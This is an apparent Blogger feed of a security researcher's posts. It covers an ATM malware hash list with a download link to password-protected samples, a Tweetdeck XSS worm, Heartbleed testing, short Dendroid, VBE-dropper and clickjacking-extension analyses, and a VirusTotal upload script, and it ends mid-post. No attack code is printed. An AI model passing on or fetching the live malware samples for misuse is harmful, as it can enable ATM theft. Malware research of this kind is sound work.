tag:blogger.com,1999:blog-27972847620540016982024-03-06T00:28:49.023+08:00Data0.Net Security BlogNotes, Programming, Analysis, Finding, MalwareUnknownnoreply@blogger.comBlogger85125tag:blogger.com,1999:blog-2797284762054001698.post-39008648992770265662015-09-30T11:53:00.000+08:002016-02-24T00:29:37.295+08:00Collection of ATM Malware, GreenDispenser SamplesHere you can download the latest ATM Malware called GreenDispenser and other related to ATM malware. I will keep update on it. If you have more samples and and hash feel free to leave a comment. Thank you.<br />
<br />
<h3>
Full SHA-256 hash list</h3>
<div>
<br /></div>
<h4>
GreenDispenser</h4>
<ul>
<li>20a1490b666f8c75c47b682cf10a48b7b0278068cb260b14d8d0584ee6c006a5</li>
<li>50db1f5e9692f217f356a592e413e6c9cb31105a94efc70a5ca1c2c73d95d572</li>
<li>7544e7a798b791cb36caaa1860974f33d30bc4659ceab3063d1ab4fd71c8c7e0</li>
<li>77850f738ba42fd9da299b2282314709ad8dc93623b318b116bfc25c5280c541</li>
<li>b7e61f65e147885ec1fe6a787b62d9ee82d1f34f1c9ba8068d3570adca87c54f</li>
</ul>
<h4>
</h4>
<h4>
</h4>
<h4>
<br />
Ploutos</h4>
<ul>
<li>0106757fac9d10a8e2a22dce5337f404bfa1c44d3cc0c53af3c7539888bc4025</li>
<li>0df8ac0440a151fac1f6957f7d181640590e1eb3e4c4cbd9968892e59f34f941</li>
<li>34acc4c0b61b5ce0b37c3589f97d1f23e6d84011a241e6f85683ee517ce786f1</li>
<li>d99339d3dc6891cdd832754c5739640c62cd229c84e04e9e3cad743c6f66b1b9</li>
</ul>
<h4>
<br />
Suceful</h4>
<ul>
<li>c7cb44e0b075cbc90a7c280ef8f1c69e8fe06e7dabce054b61b10c3105eda1c4</li>
<li>d33d69b454efba519bffd3ba63c99ffce058e3105745f8a7ae699f72db1e70eb</li>
</ul>
<br />
<h4>
Tyupkin</h4>
<ul>
<li>b670fe2d803705f811b5a0c9e69ccfec3a6c3a31cfd42a30d9e8902af7b9ed80</li>
<li>16166533c69f2f04110e8b8e9cc45ed2aeaf7850fa68845c64d92ff907dd44f0</li>
<li>6c59cd1e12bc1037031af48b934e9398fc85efb2a067d03b6a100dd8423e5d9b</li>
<li>8bb5c766de0a73dc0eff7c9fce086565b6220465185e258c21c5b9dfb0bef51d</li>
<li>639d2d926325275cb023014d0b446d03f1dcc8526bff1aa72373e27d78a6a674</li>
<li>853fb4e85d8b0ad7c156ad6d3fc4b0340c8b29fa0548a3df758e7845ba8b23ae</li>
<li>3639e8cc463922b427ea20dce8f237c0c0e82aa51d2502c48662e60fb405f677</li>
</ul>
<h4>
</h4>
<h4>
</h4>
<br />
<h4>
NeoPocket</h4>
<ul>
<li>85652bbd0379d73395102edc299c892f21a4bba3378aa3b0aaea9b1130022bdd</li>
</ul>
<br />
<br />
<h4>
Download From Google Drive:</h4>
<br />
<ul>
<li><a href="https://drive.google.com/folderview?id=0B6y1wjhVZ-WPbmR4aTJkOUZDUUE&usp=sharing" target="_blank">Click Here to Download</a> (Password Protected Zip)</li>
<li>Feel free to ask for the password (prefer email at alternator99 |at| gmail.com).</li>
</ul>
<br />
<h4>
References:</h4>
<br />
<ul>
<li>https://www.fireeye.com/blog/threat-research/2015/09/suceful_next_genera.html</li>
<li>https://www.proofpoint.com/us/threat-insight/post/Meet-GreenDispenser</li>
<li>https://securelist.com/blog/research/66988/tyupkin-manipulating-atm-machines-with-malware/</li>
</ul>
<h4>
</h4>
<h4>
Update:</h4>
<ul>
<li>Add another 5 Tyupkin and 4 Ploutos samples. Thanks to <b>n3r0</b> for the samples. </li>
</ul>
<br />
<ul>
</ul>
<ul>
</ul>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2797284762054001698.post-63021055607162441482014-06-12T01:01:00.000+08:002014-06-12T10:19:37.411+08:00Tweetdeck XSS Vulnerability Cause User Auto-RetweetAs I'm one of the Tweetdeck user, somebody has post new XSS on twitter causing thousand of user automatically retweet the XSS script message. This is only affected on TweetDeck on browser so far.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU4yBDcI4WQlcZsculury1yHKrGSCPM5vfJ5OD2UfQeouwRatm3Ee_cXvGaOWWTCfQeNTR0Sy9KQnbDqdfQR5uLB46Ld3wAOtStu1And81Z33kYkKM1_W6L7lv1J2MPpZBeB_jj-phL_c/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU4yBDcI4WQlcZsculury1yHKrGSCPM5vfJ5OD2UfQeouwRatm3Ee_cXvGaOWWTCfQeNTR0Sy9KQnbDqdfQR5uLB46Ld3wAOtStu1And81Z33kYkKM1_W6L7lv1J2MPpZBeB_jj-phL_c/s1600/1.png" height="105" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
An example of post has been retweet.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbDRgpnhFnfdOqXwNiIHtbu_t9cO8It966Fwhi1JC-kObOMTLxLJSye6O8-dXPy0RSwb_pfRTspqtuy9KjtP9pugdr-ux1RD8z4yLpHYPTmaTZ6sqxTw9zJBsGMC5urYAI5PmN5iIE2Dw/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbDRgpnhFnfdOqXwNiIHtbu_t9cO8It966Fwhi1JC-kObOMTLxLJSye6O8-dXPy0RSwb_pfRTspqtuy9KjtP9pugdr-ux1RD8z4yLpHYPTmaTZ6sqxTw9zJBsGMC5urYAI5PmN5iIE2Dw/s1600/2.png" height="171" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
An example of XSS message poping up. Once user click OK, it will retweet the post.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEickLrviTClP90wZxj5Mq22Honao5B3NrdiCyEYy91QJQpuDvURlTPYwfBIQQPuZS-p2PuAGGSytl6_QFrDSoR7awm5PuOI975ODLixWJmcyaje2DfiwcdPdYlVl5h-NsSGGtcW3bhP5-8/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEickLrviTClP90wZxj5Mq22Honao5B3NrdiCyEYy91QJQpuDvURlTPYwfBIQQPuZS-p2PuAGGSytl6_QFrDSoR7awm5PuOI975ODLixWJmcyaje2DfiwcdPdYlVl5h-NsSGGtcW3bhP5-8/s1600/3.png" height="256" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
By the time this is happened, Tweetdeck server temporarily down for awhile for fixing and 40k of retweeted post has been done.<br />
<br />
~ alternat0r<br />
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2797284762054001698.post-38823859990669524172014-04-09T19:03:00.000+08:002014-04-10T01:19:28.425+08:00HeartBleed May 'Broken Your Heart' as Data Leaks<div style="text-align: justify;">
Recent OpenSSL bug called Heartbleed (CVE-2014-0160) causing million of website in trouble. Heartbleed test developed by Filippo Valsorda has been release as open source. I just give some play around with Heartbleed.<br />
<br />
BTW, What is Heartbleed bug? Heartbleed bug is actually vulnerability on OpenSSL cryptography library that cause any user to read system memory (Affected on vulnerable version only).<br />
<br />
Dalam bahasa Malaysianya, ia adalah kelemahan yang terdapat pada <i>library </i>kriptografi<i> </i>perisian OpenSSL yang membolehkan pengguna luar membaca sistem memori (terjejas pada versi tertentu sahaja).</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
As I giving test to several Malaysia website, most critical organisation website exposed to this vulnerability including government.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6S1EmBSEJ7ull7gpazcXlAxmIqxM_4iIzLRuONha4OfRoGT_5URJJUJHg1qKhadTerXcz9A9QOa-vhiCr8oW9IU04vq-adgPZxbYDD3hdpvfREiHlQZVVluVQLRpUTjOfXRpi6I3biYo/s1600/hb1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6S1EmBSEJ7ull7gpazcXlAxmIqxM_4iIzLRuONha4OfRoGT_5URJJUJHg1qKhadTerXcz9A9QOa-vhiCr8oW9IU04vq-adgPZxbYDD3hdpvfREiHlQZVVluVQLRpUTjOfXRpi6I3biYo/s1600/hb1.jpg" height="324" width="100%" /></a></div>
<br />
<span style="text-align: justify;">Filippo also provide a website for you to test your webserver and if it is vulnerable you will get message like image below:</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrli57ZxfOWpseZHX8-m5G85y8sW3fue-BNRT9i1v8Ba58kMz0YmkykD4f5IKTVhGk72rD-we32D9Eoq_JUsoel7l2jJZ0jNA25q-mo6bGh03KM9OnRs7E9Rm5RuNWBd-FpHYs9shdSFY/s1600/hb2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrli57ZxfOWpseZHX8-m5G85y8sW3fue-BNRT9i1v8Ba58kMz0YmkykD4f5IKTVhGk72rD-we32D9Eoq_JUsoel7l2jJZ0jNA25q-mo6bGh03KM9OnRs7E9Rm5RuNWBd-FpHYs9shdSFY/s1600/hb2.jpg" height="458" width="100%" /></a></div>
<br />
Alternatively you can access to Malaysia honeynet heartbleed website to test your webserver:<br />
http://heartbleed.honeynet.org.my/<br />
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
Here some good advice how to protect yourself from heartbleed bug:<br />
http://www.cnet.com/news/how-to-protect-yourself-from-the-heartbleed-bug/<br />
<br />
<b>References</b>:<br />
http://heartbleed.com/<br />
https://github.com/FiloSottile/Heartbleed<br />
http://filippo.io/Heartbleed<br />
http://heartbleed.honeynet.org.my/<br />
https://gist.github.com/harlo/10199638<br />
<br />
~ alternat0r Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2797284762054001698.post-67465185148959658132014-03-13T11:44:00.000+08:002014-03-13T11:45:02.432+08:00Dendroidbot Quick AnalysisAs I get the sample of Dendroid APK malware I decided to make quick analysis on it. Thanks to <a class="g-profile" href="https://plus.google.com/111962545432947598219" target="_blank">+Mila Parkour</a> for the sample.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-37Kt9clNsS0/UxnRA3_47VI/AAAAAAAAO5s/KzbCSqnYQzw/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-37Kt9clNsS0/UxnRA3_47VI/AAAAAAAAO5s/KzbCSqnYQzw/s1600/2.png" height="267" width="400" /></a></div>
<br />
DB01F96D5E66D82F7EB61B85EB96EF6E<br />
52A30B58257D338617A39643E2216D0C <br />
<br />
The original sample is protected with <a href="http://www.saikoa.com/dexguard" target="_blank">Dexguard</a> to give extra protection on its code as its will appeared to be obfuscated when decompiling. <br />
<br />
The following permission can be used once it has been installed:<br />
<ul>
<li>directly call phone numbers</li>
<ul>
<li>read phone status and identity</li>
<li>reroute outgoing calls</li>
</ul>
<li>edit your text messages (SMS or MMS)</li>
<ul>
<li>read your text messages (SMS or MMS)</li>
<li>receive text messages (SMS)</li>
<li>send SMS messages</li>
</ul>
<li>take pictures and videos</li>
<li>record audio</li>
<li>precise location (GPS and network-based)</li>
<li>read call log</li>
<ul>
<li>read your contacts</li>
</ul>
<li>read your Web bookmarks and history</li>
<li>modify or delete the contents of your SD card</li>
<li>find accounts on the device</li>
<li>full network access</li>
<ul>
<li>view network connections</li>
</ul>
<li>retrieve running apps</li>
<li>prevent phone from sleeping</li>
<li>modify system settings</li>
<ul>
<li>test access to protected storage</li>
</ul>
</ul>
As we analyzed the java class, its also can determine if its running on emulator or not. There are many functionality that would be able to completely spy your phone as we going through its java classes.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgc4VXlci2XiVNPyp6uKN_oS44WmmFfF4z9cgK2MFjAMJshhqzQEK11CIq7zOiUNtD6zJy1fpW67kWJG3jg8SDIZO6-ioppq4qyDXzs-mCx4OXcGRYtgopvMd2JwPcDRYpdTAkmpsq0-GE/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgc4VXlci2XiVNPyp6uKN_oS44WmmFfF4z9cgK2MFjAMJshhqzQEK11CIq7zOiUNtD6zJy1fpW67kWJG3jg8SDIZO6-ioppq4qyDXzs-mCx4OXcGRYtgopvMd2JwPcDRYpdTAkmpsq0-GE/s1600/3.png" height="171" width="400" /></a></div>
<br />
initiate() load pre-defined configuration with base64 encoded.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqnkhMQUzWiIsyP6fqOPVKwVDiWS4of8ZEA32aqQFbFOO2wF0QVq4d6BQh_Mj6owa1ojE8nIggs-PZeGZD7mygZSkNpydOzWbl4NiyFA7AbIx2HdYtus9XBWiT3s1Q8ozkIrIQQ5ty9Ow/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqnkhMQUzWiIsyP6fqOPVKwVDiWS4of8ZEA32aqQFbFOO2wF0QVq4d6BQh_Mj6owa1ojE8nIggs-PZeGZD7mygZSkNpydOzWbl4NiyFA7AbIx2HdYtus9XBWiT3s1Q8ozkIrIQQ5ty9Ow/s1600/1.png" height="160" width="400" /></a></div>
<br />
Here from VirusTotal detection list:<br />
<a href="https://www.virustotal.com/en/file/099a57328de9335c524f44514e225d50731c808145221affdd684d8b4dad5a1d/analysis/">https://www.virustotal.com/en/file/099a57328de9335c524f44514e225d50731c808145221affdd684d8b4dad5a1d/analysis/</a><br />
<br />
Although, this sample is an earlier version of Dendroid. Some user might already found recent version of it bind with other application to make it seem legitimate apps.<br />
<br />
<br />~ alternat0rUnknownnoreply@blogger.com0tag:blogger.com,1999:blog-2797284762054001698.post-77489464323752211262014-02-19T19:54:00.000+08:002014-02-19T19:54:15.527+08:00Countdown to Windows XP End of SupportThe end of Windows XP support will be on Saturday, 8 April 2014.<br />
<br />
<div style="text-align: center;">
<iframe frameborder="0" height="240" src="//w2.countingdownto.com/473077" width="350"></iframe></div>
<div style="text-align: center;">
<a href="http://countingdownto.com/">Countdown Clocks</a></div>
<br />
<a href="http://windows.microsoft.com/en-US/windows/products/lifecycle">http://windows.microsoft.com/en-US/windows/products/lifecycle</a><br />
<br />
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2797284762054001698.post-26635396545787684942014-02-01T01:13:00.003+08:002014-02-04T12:53:11.872+08:00ApacheBench behind the Encoded VBE fileRecently I received a VBE file from a friend that looks suspicious with its encoded content and request to do quick analysis on it. So, I manage to play around with it and see what's inside.<br />
<br />
The file name that I got is s64.vbe (0B826D9869B139B2C5BB139234C08D43) which is an encoded script file content. The size of this file is around 608,904 bytes. The content of the encoded file is shown below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirFkovUBnv3uWNEPS9WT9qgZ_KPvzh1gGOD5XVnotNCy8jWQLJvSg8jEgs7qgz0DD4Ugry5BvdRyDibZxY6NluwjKSLj2KYYWaT0C_FgyuvID2r6AkCiD2LTQYM4Un0PoSSm1Fixyk8aQ/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirFkovUBnv3uWNEPS9WT9qgZ_KPvzh1gGOD5XVnotNCy8jWQLJvSg8jEgs7qgz0DD4Ugry5BvdRyDibZxY6NluwjKSLj2KYYWaT0C_FgyuvID2r6AkCiD2LTQYM4Un0PoSSm1Fixyk8aQ/s1600/1.png" height="80" width="400" /></a></div>
<br />
To decode this file I use <a href="http://www.interclasse.com/scripts/decovbe.php" target="_blank">scriptDecode.vbs from Jean-Luc Antoine</a>. The output of the decoded file is a VBScript as shown in the picture below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2F3MxLrg3Gd2OJhsOQMDvi76EnB9P2Uz2Fhrpu5gZGugJqMSp-DbVEBPGXhxdP1OzKxh1xif9bBudh1Tc_Lx9Sh69ID7HUDu7VM4Zu3MqSTqzxkSDqyE1UMTPZvyx3NrQnT9hE-VbWdg/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2F3MxLrg3Gd2OJhsOQMDvi76EnB9P2Uz2Fhrpu5gZGugJqMSp-DbVEBPGXhxdP1OzKxh1xif9bBudh1Tc_Lx9Sh69ID7HUDu7VM4Zu3MqSTqzxkSDqyE1UMTPZvyx3NrQnT9hE-VbWdg/s1600/2.png" height="88" width="400" /></a></div>
<br />
If we scroll to the bottom of the file we can see this is some kind of Windows binary file that is converted into ASCII format within VBS. The file svchost.exe is the file name use to save into the disk and run it.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVCYve_rpzFmfOPfjyckgjub-10MU5fTOtNx3jXfppryMg_aA4TaCr4mOA5ibku1Pt59QOwU2jTjv_rl_bfTyagZ4-W-vqDdq9wND2AyGSioxHeu-iC09GgvGldc1qQS71D74EZc2VPVU/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVCYve_rpzFmfOPfjyckgjub-10MU5fTOtNx3jXfppryMg_aA4TaCr4mOA5ibku1Pt59QOwU2jTjv_rl_bfTyagZ4-W-vqDdq9wND2AyGSioxHeu-iC09GgvGldc1qQS71D74EZc2VPVU/s1600/3.png" height="220" width="400" /></a></div>
<br />
Most of antivirus product is already detect this file as malicious:<br />
<br />
<a href="https://malwr.com/analysis/YzkzNDUxOTlmOTQxNDAxYmEwNjdmNGI4MTk5YjBmYzI/share/1a8cbf4acb5944d1856d04d4e72b8ed7">https://malwr.com/analysis/YzkzNDUxOTlmOTQxNDAxYmEwNjdmNGI4MTk5YjBmYzI/share/1a8cbf4acb5944d1856d04d4e72b8ed7</a><br />
<br />
<a href="https://www.virustotal.com/en/file/6b01071c7936d4a1ba1f53b5651db5f604dfe7f5aa3e4ed38d48f6ba66eebd5e/analysis/">https://www.virustotal.com/en/file/6b01071c7936d4a1ba1f53b5651db5f604dfe7f5aa3e4ed38d48f6ba66eebd5e/analysis/</a><br />
<br />
The svchost.exe (333ABC2F9864B70F7EF48B049CBA9286) file is a program called ApacheBench command line utility. At first place, this program use to measure performance test of HTTP web servers. Although, the binary file that I got is not correctly run as it not responsive sometimes. It is possible to use this tool as DDOS attack.<br />
<br />
~ alternat0rUnknownnoreply@blogger.com0tag:blogger.com,1999:blog-2797284762054001698.post-6661298974433246242013-06-21T12:22:00.001+08:002014-02-04T12:53:24.355+08:00Python - Basic VirusTotal UploaderJust my little/quick note about submitting malware sample to VirusTotal.com. Be reminded that this python code is not handling an error properly. Just for quick reference.<br />
<br />
<pre class="brush: python">import postfile
import sys, getopt
def main(argv):
inputfile = sys.argv[1]
host = "www.virustotal.com"
mfile = inputfile
selector = "https://www.virustotal.com/vtapi/v2/file/scan"
fields = [("apikey", "YOUR PUBLIC API KEY")]
file_to_send = open(mfile, "rb").read()
files = [("file", mfile, file_to_send)]
json = postfile.post_multipart(host, selector, fields, files)
print json
if __name__ == "__main__":
main(sys.argv[1:])
</pre>
<br />
You can replace the 'YOUR PUBLIC API KEY' with your own key. Get it at VirusTotal.com.<br />
<br />
~ alternat0rUnknownnoreply@blogger.com0tag:blogger.com,1999:blog-2797284762054001698.post-32288972665807806782013-02-18T18:30:00.002+08:002013-02-18T19:09:53.884+08:00'Business Flash Player' appear to be Facebook spammer<br />
Just received this wild Facebook post that suddenly tagged me for unknown reason. Its look like a community page that received 87 million user 'Like' on it. That's something fishy to me.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggi17pjnenRONJBhw6DU5NxZTyfmYMd0W0GfFRC5mYQZz9MwLyocvueT5ZWEv7WFPNcO7DiNjwpedfxgyTko8HaPsM6WWASxeazrfMSbLGPzOt34YzdjGgX_yv8H0gZUseoLJkkhDqHJJc/s1600/fb1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="110" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggi17pjnenRONJBhw6DU5NxZTyfmYMd0W0GfFRC5mYQZz9MwLyocvueT5ZWEv7WFPNcO7DiNjwpedfxgyTko8HaPsM6WWASxeazrfMSbLGPzOt34YzdjGgX_yv8H0gZUseoLJkkhDqHJJc/s400/fb1.png" width="400" /></a></div>
<br />
This look suspicious to me when the provided URL is unreadable to me. Obviously it is in unicode character or IDN. It's Armenian language there (ask Google translate or <a href="http://en.wikipedia.org/wiki/En_with_middle_hook" target="_blank">Wikipedia</a>).<br />
<br />
Well, lets check it out whats so special about this FB post. Once you click on that weird URL you will be redirected to the fastotolike.com. The website looks like some kind of 'auto-like' or click jacking script.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirZUK5sr6uxRQgL-tpouuN7IuSfvuTuSIosjplUd6VdgAfqymgyZgw_oThvAjt66XV4IlnTaLGKhHgdT_Ea5aScTKlgMaSIfjl9O5CrzxsOzBUlxOi7IoRp0LQPBNXHywdJ2jbks4zUuGM/s1600/fastotolike.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="297" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirZUK5sr6uxRQgL-tpouuN7IuSfvuTuSIosjplUd6VdgAfqymgyZgw_oThvAjt66XV4IlnTaLGKhHgdT_Ea5aScTKlgMaSIfjl9O5CrzxsOzBUlxOi7IoRp0LQPBNXHywdJ2jbks4zUuGM/s400/fastotolike.png" width="400" /></a></div>
<br />
If you click anywhere on the page you will be prompted another strange popup (I'm using Google Chrome for this test). The popup message prompt you to install some kind of plug-in or extension for Chrome. There is multiple popup open up 8 times according to its javascript. See image below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj35WgQjkzdRm2NkwbcfUcINTZWwpk5wAou46v3nHWjf-kN9yu2WJslplX-mklQetv_GhErhObt-laSsxUpiDtoB4le9IvG_619vlO7DBEoRBPnM8Oj6DezUdAAjfqoVh1x2KYhN5DTGLD6/s1600/fastotolike2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj35WgQjkzdRm2NkwbcfUcINTZWwpk5wAou46v3nHWjf-kN9yu2WJslplX-mklQetv_GhErhObt-laSsxUpiDtoB4le9IvG_619vlO7DBEoRBPnM8Oj6DezUdAAjfqoVh1x2KYhN5DTGLD6/s400/fastotolike2.png" width="378" /></a></div>
<br />
Looking at the source code you will find there is Turkish language hoping that user will click the 'Add' button.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3a1uyNWZoxX3OmV9QnHDA2b5Z7Jor62T4dsGHLy4AGYN70x40pjwXwrTuZMKiGsTL1CciiFyHqYTnAB0lDEoi44QvbuMQ7fU2vPNu3oqC-FFfXMjv8u_4SO3Gcl9nhUlfpX9APbhAq41u/s1600/fastotolike3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="298" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3a1uyNWZoxX3OmV9QnHDA2b5Z7Jor62T4dsGHLy4AGYN70x40pjwXwrTuZMKiGsTL1CciiFyHqYTnAB0lDEoi44QvbuMQ7fU2vPNu3oqC-FFfXMjv8u_4SO3Gcl9nhUlfpX9APbhAq41u/s400/fastotolike3.png" width="400" /></a></div>
<br />
It's look like the app is available at Google Web Store and disguise as 'Business Flash Player !' With no description and no screenshot, definitely looks fishy. See image below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqMAmPYzacM-IJLeILaUa3XyBoA3TI0jHEbH6QSBD6IifH433BlSc3XbQI7uLIoN0oQycrrccpW4Xa6m8e_GG_igKtK6XRnojizV0a8ZcFMq3sxZtVN5HRf3RpdHxJdUfGLgKZBQxOOmY/s1600/fastotolike4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="307" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqMAmPYzacM-IJLeILaUa3XyBoA3TI0jHEbH6QSBD6IifH433BlSc3XbQI7uLIoN0oQycrrccpW4Xa6m8e_GG_igKtK6XRnojizV0a8ZcFMq3sxZtVN5HRf3RpdHxJdUfGLgKZBQxOOmY/s400/fastotolike4.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both;">
If you try to install it you will see your extension appear in the Chrome Extensions list.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSvd3V3T5HjnJXr7M8qXA7BMYuVi2hQVhwJHPUl2Xbxfg2OFmSULP3lJEhU0fM1ElRR4Ga0E6aPxTWXCvU0rysPCKLdG7Y_qFtS3qHD4Q6DKeDxcmFsnYI4trht1r_Q1F3ZqduS7ZQBGV-/s1600/fastotolike5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="176" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSvd3V3T5HjnJXr7M8qXA7BMYuVi2hQVhwJHPUl2Xbxfg2OFmSULP3lJEhU0fM1ElRR4Ga0E6aPxTWXCvU0rysPCKLdG7Y_qFtS3qHD4Q6DKeDxcmFsnYI4trht1r_Q1F3ZqduS7ZQBGV-/s640/fastotolike5.png" width="640" /></a></div>
<br />
Lets take a look on installed extension source code. There is two link which is one of it will be redirect to malicious website. See image below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnMthCSyRx8wauYnP3OmhJ4vubQqPnftL1wcJPUeygb3-J1jhJxQpP814PbrXebPyHbyfesXnmrWuyKgMIKHaaDqejQ5YfOOLKcoay-00jQ-2gWjbX1dwoVyt1Y93IIeobNHCgGb4DNf1b/s1600/fastotolike6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="237" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnMthCSyRx8wauYnP3OmhJ4vubQqPnftL1wcJPUeygb3-J1jhJxQpP814PbrXebPyHbyfesXnmrWuyKgMIKHaaDqejQ5YfOOLKcoay-00jQ-2gWjbX1dwoVyt1Y93IIeobNHCgGb4DNf1b/s400/fastotolike6.png" width="400" /></a></div>
<br />
The redirect URL will be go to the http://fastotolike.com/yeni.php which is some how reveal its long line comment source code. So, for this test I just uncomment the js code and make it beautiful.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
